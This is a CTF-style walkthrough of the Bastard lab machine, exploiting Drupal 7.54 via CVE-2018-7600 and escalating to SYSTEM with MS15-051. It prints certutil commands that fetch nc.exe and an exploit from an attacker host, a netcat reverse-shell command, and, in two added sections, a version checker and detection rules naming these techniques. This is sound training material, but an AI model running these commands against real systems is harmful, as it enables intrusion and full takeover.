Bastard - Medium

OSCP Prep Box

Introduction@Bastard:~$

Name: Bastard

IP: 10.10.10.9

OS: Windows

Points: 30

Difficulty: Medium

Creator:

Release Date: 19 March 2017

Enumeration

Nmap

# Nmap 7.92 scan initiated Thu Dec 30 10:54:46 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.9
Nmap scan report for 10.10.10.9
Host is up (0.32s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc   Microsoft Windows RPC
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 30 10:56:36 2021 -- 1 IP address (1 host up) scanned in 110.02 seconds

Only three ports are open.

Web

Port 80 is running the Drupal CMS. Drupal has a long history of vulnerabilities, so the first step is to find out which version is installed and then look for a matching exploit. The version can be read from CHANGELOG.txt:

┌─[sheinn101@parrot]─[~/htb/oscp/bastard]
└──╼ [??]$ curl -s http://10.10.10.9/CHANGELOG.txt | head

Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
- Logging of searches can now be disabled (new option in the administrative
  interface).
- Added menu tree render structure to (pre-)process hooks for theme_menu_tree()
  (API addition: https://www.drupal.org/node/2827134).
- Added new function for determining whether an HTTPS request is being served

Drupal is running version 7.54.
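As an added example (not part of the original write-up), here is the version check above written as a small script: it parses the first line of CHANGELOG.txt and compares the release against 7.58, the Drupal 7 release that fixed CVE-2018-7600 (the exploit banner further down says "<= 7.57"). The sample text is constructed from the curl output shown on this page; note that robots.txt only asks crawlers to skip CHANGELOG.txt, it does nothing to stop a direct request like the one above.

```python
"""Added example (not part of the original write-up): read the Drupal 7 core
version from the first line of CHANGELOG.txt and check it against the release
that fixed CVE-2018-7600 (Drupal 7.58; the exploit banner above says <= 7.57).
The sample text is constructed from the curl output shown on this page."""
import re
from typing import Optional, Tuple

# Drupal 7 CHANGELOG.txt starts with the newest release, e.g. "Drupal 7.54, 2017-02-01".
CHANGELOG_HEADER = re.compile(r"^Drupal\s+(\d+)\.(\d+),\s+\d{4}-\d{2}-\d{2}", re.M)

# First Drupal 7 release that includes the fix for CVE-2018-7600 (SA-CORE-2018-002).
FIXED_7X = (7, 58)

def parse_changelog_version(text: str) -> Optional[Tuple[int, int]]:
    """Return (major, minor) of the newest release listed, or None if no header is found."""
    m = CHANGELOG_HEADER.search(text)
    return (int(m.group(1)), int(m.group(2))) if m else None

def vulnerable_to_cve_2018_7600(version: Tuple[int, int]) -> bool:
    """True for every Drupal 7 release below 7.58, i.e. 7.0 through 7.57."""
    major, minor = version
    return major == 7 and (major, minor) < FIXED_7X

def assess(changelog_text: str) -> str:
    """Collapse the two steps into a one-word verdict for a scanner or report."""
    version = parse_changelog_version(changelog_text)
    if version is None:
        return "unknown"
    return "vulnerable" if vulnerable_to_cve_2018_7600(version) else "patched"

# Constructed sample: the head of CHANGELOG.txt as served by this box.
SAMPLE = """Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to define theme engines (API addition:
  https://www.drupal.org/node/2826480).
"""

if __name__ == "__main__":
    print(parse_changelog_version(SAMPLE), assess(SAMPLE))  # (7, 54) vulnerable
```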

Finding Exploit

There are many exploits for this version; I chose a Python script because it is easy to run.

https://github.com/pimps/CVE-2018-7600

┌─[sheinn101@parrot]─[~/htb/oscp/bastard/CVE-2018-7600]
└──╼ [??]$ python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "whoami"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-qYJ2NwZrrbby9Ni3lcPLtZgfUQqAbCtJcoQ6w_l2zug
[*] Triggering exploit to execute: whoami
nt authority\iusr

We can check the OS architecture with this command.

┌─[sheinn101@parrot]─[~/htb/oscp/bastard/CVE-2018-7600]
└──╼ [??]$ python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "wmic OS get OSArchitecture"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-6RIAIGKgoCtEq8pfK9I4voh1u6KpPFch5bnbDCVwEeg
[*] Triggering exploit to execute: wmic OS get OSArchitecture
OSArchitecture  
64-bit

This is a 64-bit machine. Now let's try to get a reverse shell.

Getting Reverse Shell

┌─[sheinn101@parrot]─[~/htb/oscp/bastard/CVE-2018-7600]
└──╼ [??]$ python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "certutil.exe -urlcache -split -f http://10.10.14.7/nc.exe"

=============================================================================
|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           |
|                              by pimps                                     |
=============================================================================

[*] Poisoning a form and including it in cache.
[*] Poisoned form ID: form-RhKepY9VqzbvkjVKZKOQ19DNKXfJ5BhSuBYWEz6irE4
[*] Triggering exploit to execute: certutil.exe -urlcache -split -f http://10.10.14.7/nc.exe
****  Online  ****
  0000  ...
  6e00
CertUtil: -URLCache command completed successfully.

First I upload nc.exe to the victim machine (above), then run it to connect back to my listener on port 443.

python3 drupa7-CVE-2018-7600.py http://10.10.10.9/ -c "nc.exe 10.10.14.7 443 -e cmd.exe"
Directory of c:\Users\dimitris\Desktop

19/03/2017  08:04     <DIR>          .
19/03/2017  08:04     <DIR>          ..
19/03/2017  08:06                 32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.808.027.136 bytes free

type user.txt
type user.txt
ba22fde1932d*******3d312f921a2
c:\Users\dimitris\Desktop>

Privilege Escalation

systeminfo

systeminfo

Host Name:                 BASTARD
OS Name:                   Microsoft Windows Server 2008 R2 Datacenter 
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00496-001-0001283-84782
Original Install Date:     18/3/2017, 7:04:46 
System Boot Time:          3/1/2022, 6:17:36 
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC
Processor(s):              2 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             el;Greek
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory:     2.047 MB
Available Physical Memory: 1.582 MB
Virtual Memory: Max Size:  4.095 MB
Virtual Memory: Available: 3.606 MB
Virtual Memory: In Use:    489 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    HTB
Logon Server:              N/A
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
                                 Connection Name: Local Area Connection
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.9

Running an exploit suggester (output not shown here) lists a couple of candidate exploits; I chose MS15-051 (ms15-051x64.exe).

https://www.exploit-db.com/exploits/37049

Download it and transfer it to the victim machine with certutil, as above.

c:\inetpub\drupal-7.54>
certutil.exe -urlcache -split -f "http://10.10.14.7/ms15-051x64.exe"
certutil.exe -urlcache -split -f "http://10.10.14.7/ms15-051x64.exe"
****  Online  ****
  0000  ...
  d800
CertUtil: -URLCache command completed successfully.

dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of c:\inetpub\drupal-7.54

03/01/2022  07:41     <DIR>          .
03/01/2022  07:41     <DIR>          ..
19/03/2017  12:42                317 .editorconfig
19/03/2017  12:42                174 .gitignore
19/03/2017  12:42              5.969 .htaccess
19/03/2017  12:42              6.604 authorize.php
19/03/2017  12:42            110.781 CHANGELOG.txt
19/03/2017  12:42              1.481 COPYRIGHT.txt
19/03/2017  12:42                720 cron.php
19/03/2017  12:43     <DIR>          includes
19/03/2017  12:42                529 index.php
19/03/2017  12:42              1.717 INSTALL.mysql.txt
19/03/2017  12:42              1.874 INSTALL.pgsql.txt
19/03/2017  12:42                703 install.php
19/03/2017  12:42              1.298 INSTALL.sqlite.txt
19/03/2017  12:42             17.995 INSTALL.txt
19/03/2017  12:42             18.092 LICENSE.txt
19/03/2017  12:42              8.710 MAINTAINERS.txt
19/03/2017  12:43     <DIR>          misc
19/03/2017  12:43     <DIR>          modules
03/01/2022  07:41             55.296 ms15-051x64.exe
03/01/2022  06:48             28.160 nc.exe
19/03/2017  12:43     <DIR>          profiles

ms15-051x64.exe "whoami"
[#] ms15-051 fixed by zcgonvh
[!] process with pid: 1748 created.
==============================
nt authority\system
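From the defender's side, both file transfers on this page (nc.exe and ms15-051x64.exe via certutil), the nc.exe -e reverse shell, and the web process spawning cmd.exe all leave distinctive process-creation records. The following is an added example, not part of the original write-up, that runs simple rules over constructed 4688/Sysmon-style records modelled on the command lines shown above; php-cgi.exe as the parent of cmd.exe is an assumption about how PHP runs under IIS FastCGI, and all paths and users are constructed.

```python
"""Added example (not part of the original write-up): flag the process activity this
box produced (certutil URL downloads, an nc -e reverse shell, a web process spawning
cmd.exe) in 4688/Sysmon-style records. All records and paths are constructed."""
import re
from typing import Dict, List
# Constructed records modelled on the command lines shown in this write-up.
EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\PHP\php-cgi.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c certutil.exe -urlcache -split -f http://10.10.14.7/nc.exe",
     "User": r"NT AUTHORITY\IUSR"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"c:\inetpub\drupal-7.54\nc.exe",
     "CommandLine": r"nc.exe 10.10.14.7 443 -e cmd.exe", "User": r"NT AUTHORITY\IUSR"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r'certutil.exe -urlcache -split -f "http://10.10.14.7/ms15-051x64.exe"',
     "User": r"NT AUTHORITY\IUSR"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify -urlfetch cert.cer", "User": r"HTB\dimitris"},  # benign
]

# Command-line rules: certutil asked to pull a URL into its cache, and netcat with -e.
COMMAND_RULES = [
    ("certutil_remote_download", re.compile(r"certutil(?:\.exe)?\s(?=.*-urlcache)(?=.*https?://)", re.I)),
    ("netcat_exec_shell", re.compile(r"\bnc(?:64)?(?:\.exe)?\s.*\s-e\s+\S+", re.I)),
]
WEB_PARENTS = ("\\w3wp.exe", "\\php-cgi.exe")  # IIS worker and its PHP FastCGI child (assumed)
SHELLS = ("\\cmd.exe", "\\powershell.exe")

def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the record matches (empty list if nothing fired)."""
    hits = [name for name, rx in COMMAND_RULES if rx.search(event.get("CommandLine", ""))]
    # Structural rule: a web-serving process launching a command interpreter is the
    # first visible sign that the Drupal RCE on this box was used to run commands.
    if event.get("ParentImage", "").lower().endswith(WEB_PARENTS) \
            and event.get("Image", "").lower().endswith(SHELLS):
        hits.append("web_process_spawns_shell")
    return hits

def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map record index -> rule hits, keeping only the records that matched something."""
    findings: Dict[int, List[str]] = {}
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings[i] = hits
    return findings

if __name__ == "__main__":
    for idx, hits in triage(EVENTS).items():
        print(idx, EVENTS[idx]["User"], hits)
```

The benign certutil -verify record is included so the certutil rule can be checked against ordinary certificate-management use rather than just the download form.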

We can execute commands as NT AUTHORITY\SYSTEM. The next step is to turn this into a SYSTEM shell.

cd c:\users\administrator\desktop

dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 605B-4AAA

 Directory of c:\Users\Administrator\Desktop

19/03/2017  07:33     <DIR>          .
19/03/2017  07:33     <DIR>          ..
19/03/2017  07:34                 32 root.txt.txt
               1 File(s)             32 bytes
               2 Dir(s)  30.807.965.696 bytes free

type root.txt.txt
type root.txt.txt
4bf12b963d********6f617f7ba7c
c:\Users\Administrator\Desktop>

https://app.hackthebox.com/profile/237587

Reference

https://github.com/pimps/CVE-2018-7600

https://www.exploit-db.com/exploits/37049
